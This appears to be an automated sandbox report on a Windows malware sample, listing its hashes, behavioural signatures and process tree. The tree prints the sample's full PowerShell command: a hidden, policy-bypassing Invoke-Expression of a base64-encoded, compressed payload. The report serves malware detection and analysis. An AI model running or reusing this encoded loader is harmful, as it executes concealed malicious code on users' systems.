Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
21/04/2024, 05:21
Static task
static1
Behavioral task
behavioral1
Sample
fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe
Resource
win10v2004-20240412-en
General
-
Target
fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe
-
Size
90KB
-
MD5
fe874a810919c2453e9723f6716a46f4
-
SHA1
9119d485911ea46515ac4e46d35599b1e16b918f
-
SHA256
dd6e2033cd45addc571cbb7eba7c6ad3b80e172f26f29256d6f2aacf94eaf4d8
-
SHA512
53abeb877a9a3ad139056b667ad16a9d12b97b7bae31440a44a5c27d030ef3f23bd66740cbd50fc184dcb84bb1ed4c926b3a2911f1bb8441a53e045d08feb98f
-
SSDEEP
1536:IM7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIfMwM5HOB:ICFfHgTWmCRkGbKGLeNTBfMI
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3116 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3116 powershell.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 4776 wrote to memory of 1356 4776 fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe 87 PID 4776 wrote to memory of 1356 4776 fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe 87 PID 1356 wrote to memory of 3116 1356 cmd.exe 88 PID 1356 wrote to memory of 3116 1356 cmd.exe 88 PID 1356 wrote to memory of 3116 1356 cmd.exe 88
Processes
-
C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\377B.tmp\377C.tmp\377D.bat C:\Users\Admin\AppData\Local\Temp\fe874a810919c2453e9723f6716a46f4_JaffaCakes118.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\syswow64\windowspowershell\v1.0\powershell.exeC:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -EncodedCommand -ExecutionPolicy -Noninteractive -NoProfile -W Hidden Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZtb9pIEP7OrxhZe6rdYMcESpNYSE1J03ItaS6QpHcIVYu9wDbrXWe9TqCU/35jbN7SL1U/nE5I2Lue2Xl75pklD9CCN1ZlcC5EJ06UNrZ1z7Rkon7kRUJYzhCSbCR4CKmhBh9sZvA7dKS5MhpuuTYZFWdCqNAu90RyFkWapWkVMi4NRE89/p2Vi3Ehi0cp2Z8n2+0rrQwLjRP8ti9tzahh/Sk+oq0vxfrMGM1HmWE7Thka3heebYRxT5uN95vtK6ppzNDWRnllC0O4EHSyK1lY60QYhvWmwse2/Z4Z967b+Tz6htGB2xY0TeGOy/rRVww5RENKO95lFo+Y/jz+pCY8pGLzJQV3wqDmwKIyeDs3bDAcksv+VV9TmcbctKq1l43jYHdr4A9b/qz2NtjIpyxUMnqusr+70SJSnYW57RYZU5GyoK/nC9JT4T0zrUv25JaBXDLjFbtp+bQHu3tlEi9ozMV8eHqKGWIaBZ6Uvq8OftbOsYBi5xPM9P73HBgqVKKUuIkSJygd8tpKSvTGfpGlXqKU8KRJPKUnL6q1o7oTDG4Vj4Zr4R6Tkb2bqucC1yxk/JHtyywRq+F0sZMXozO2DIjOZF8ZKlp+cKH0OxpObdKREZsBl7BXkYbveY360FlsdTZvL49eNQ8KPTxzzHVq+jxmLXsn1+c5rHHTrp34frWGP3/1G6w/fOQyylNjQsfJM9/lQvCiwKk9uMHcNxtDe2uz5vs+SvZWEsEK9G5PMJaAm0KtXtQcHcjz8j8qeunRL1Z9LV2UfR/uPwltSv9cbmtUqJTZvwuHZ932q4hABgH7v4MCuLCFYME8dXCVhk24ORGZHB0Rzg3r7G37/N3F+w+dPz9+6l5+vvrrute/ub378vc/dBRGbDyZ8m/3IpYqecBDs8en2fy7jzVqvGq+Pj6xvL5qT6k+05rObacyzmSYcyqENnl0FqCZyZDdbXuAnItEBuRxXwN+QJfRNNNsnR63l8UYTBbDH4B05vvgsgc4OXKW29MNLMg4994Kap5X/zFWSNnh1FWrI/DbQQtINLAnSNxYr0jF4MZ0xmM8lUTeJyYnZuoMl0HpHxkHO6czWEBSsDcsBjR3dEhmaA7/DoB8XQaAeEQXZug9Erwp7cLClljmcnG9sut4EiccYm65Y2CyAPQYbMIRaYSDKww0G/h2cIBwmqIlE5D73GCEFlgAUAaIKmKFxXuUS3OBae6RCCAHGeY8dbC666yjBJotF9bJ45cbC8MsepTpRx6yK4Vl6VJJJ0wj4vJdpttMGz7GEWbYLRU8Wg3JNhVihMMWbS7W7RLjYgfXvXlqWOzlx9+xUVtwJk1QIbH3Accp0ytqsa0sZdpFe9JYVbC66juCmx42PB/9V3GCxkYCI+72Ou+g6dWCfM5G6imFy75jYS9LNDoJYD0ZgSR5GmLvXD1JoWiETURta2pMkp4eHtZeH3k1PKZ57NXq/umxf+wfEmmBUyEK9dAjN6cnRAfLh/c5G3PJVzUiD+Be4o0BrNWgt8CVuEoTGrJi9F+U1cTxnuB9wEx1ViGzFlGnp3s3Kr9KkhJxVX9Wx17FR8NH+ioTdp1Jg73qrZhWJWVpUq9LdTqlAuvSVsncJkkV/CoMinsK9v8MOwkX9SPbcaqwMZKHhiq7F6mcXcisoJm841RmXJkJhM3e3CgJ5LjZ8P2SI5f/Ag==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3116
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f09183586480dccf9fece371e9e7658
SHA16ec0e7ffe68a2903720fb759d303ef9353156fdf
SHA256be59bce0a84c42b1387aa2d4aedac1a08a84a90cba9333b0f5e9c632e998a605
SHA512cb04862075f911a4bb156bd172f733da0b18f2ee5043ecf50cfc46cdc0a921b8bfe64fedfffc08a5fdf5246087a89e74598d8cfe1448bd79d8078ca18576cdbb
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82